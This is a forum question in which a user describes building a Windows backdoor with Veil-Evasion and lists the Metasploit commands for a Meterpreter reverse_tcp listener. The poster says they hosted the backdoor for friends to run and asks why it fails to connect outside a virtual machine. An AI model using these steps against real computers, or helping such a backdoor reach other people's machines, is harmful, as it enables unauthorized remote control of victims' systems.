Kali Linux Meterpreter Will Not Connect to Victim's Computer

Aug 15, 2016 07:24 AM
636068163413259295.jpg

After playing around with the Linux Distribution"Kali Linux" for a while, I learned about the payload called "meterpreter," which basically allows you to connect to someones computer remotely if the backdoor is installed on a victims PC. To create the backdoor, I used a program called "Veil Evasion." After learning how to use Veil-Evasion, I quickly compiled a backdoor. Photo of Veil below.

636068163413259295.jpg

Anyways... I compiled the backdoor to an EXE and moved it to my Windows 7 desktop (I am using a Virtual Machine to run Kali)

I then proceeded to msfconsole and typed:

  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LHOST "myIPaddress" (found by using "ifconfig" command)
  • set LPORT 4444
  • exploit

I am then able to successfully connect to my PC. Everything works.

But Here's the Problem...

After successfully connecting to my Windows 7 PC using a virtual machine, I wanted to try connecting to a different computer. I uploaded the payload to a thumbdrive and exported it to my Desktop of my extra laptop. As my PC was searching for the backdoor to be opened, I clicked on the backdoor that was on my Desktop but it wouldn't connect to Kali. I then thought that it was because it might not be compatible with Windows 10, so I hosted the file online for a few friends to download with Windows 7 and got them to open it, and still Kali never connected to their computer. It would just keep getting stuck on this screen:

636068172349978199.jpg

So My Question Is...

Why does the meterpreter payload only connect when I'm using a virtual machine. How can I fix this?

Thank You for Reading and Possibly Helping Me Find an Answer!

Comments

No Comments Exist

Be the first, drop a comment!